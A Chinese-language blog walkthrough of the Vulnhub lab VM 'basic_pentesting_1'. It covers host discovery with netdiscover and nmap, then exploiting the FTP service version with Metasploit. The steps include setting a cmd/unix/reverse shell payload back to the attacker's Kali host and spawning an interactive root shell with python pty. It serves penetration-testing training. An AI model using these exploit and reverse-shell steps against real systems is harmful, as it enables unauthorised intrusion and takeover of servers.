• [Vulnhub] basic_pentesting_1


    目录

    信息搜集

    msf-ftp服务版本漏洞


    描述

    这是我为我大学的网络安全小组创建的一个小型 boot2root VM。 它包含多个远程漏洞和多个权限提升向量。 我在 VirtualBox 上对此 VM 进行了所有测试,因此这是推荐的平台。 我被告知它也适用于 VMware,但我没有亲自测试过。

    此 VM 专门用于渗透测试的新手。 如果您是初学者,您应该希望发现 VM 的难度恰到好处。

    目标:攻击VM拿到root权限

    信息搜集

    netdiscover工具

    二层发现工具,具有主动和被动发现两种方式。

    参数                        意义

    -i : 网卡           选择你监控的网卡,比如eth0

    -r : range         指定IP段,如:192.168.0.0/24

    -l : filename        从文件读取range列表

    -p                        被动模式,默默监听指定的网卡以发现别的二层主机

    -t                        ARP包发送间隔,单位毫秒,这个可用用来规避检测系统的报警

    -c                        发包数量

    试了试这个工具,感觉扫描好慢,所以还是用了nmap,不过可以记录一下这个工具

    靶机:192.168.236.133

     访问试试,没有得到可用信息。

    msf-ftp服务版本漏洞

     获得了ftp服务的版本,想搜索一下该版本是否有可利用的漏洞的话,可用msfconsole

    msfconsole :(MSF终端,The Metasploit Framework)是目前Metasploit框架最流行的用户接口。

    kali中输入msfconsole,出现下面画面即启动完毕

     发现了一个该版本可利用漏洞

     使用use命令,输入序号即可,0  进入该漏洞 exploit

    show options 看一下参数,一个是RHOSTS 一个是RPORT

     通过set命令来设置一下地址和端口,set RHOSTS 192.168.236.133

    下一步设置payload:set payload cmd/unix/reverse 这个是反向连接的payload

    show options 看一下payload的参数

     The listen address  我们设置成我们的kali地址 192.168.236.128

    设置完成后,run

    shell连接之后,python3 -c "import pty;pty.spawn('/bin/bash');" 转化为交互式。

    sudo -l发现已经是root

  • 相关阅读:
    Java锁常见面试题
    【004】Shell脚本以怎样的方式执行?
    C++ 文档搜索工具(附源码)
    2022最新 Netty底层数据交互源码剖析二
    MIT6.824-lab3B-Key/value service with snapshots(实现快照的KV服务)
    前端基础——HTML傻瓜式入门(1)
    让你的对象变得拗口:JSON.stringify(),我把对象夹进了 JSON 魔法帽!
    《JSP》
    吴恩达机器学习课程资源(笔记、中英文字幕视频、课后作业,提供百度云镜像!)
    第三章:SQL聚合与排序
  • 原文地址:https://blog.csdn.net/weixin_63231007/article/details/125512418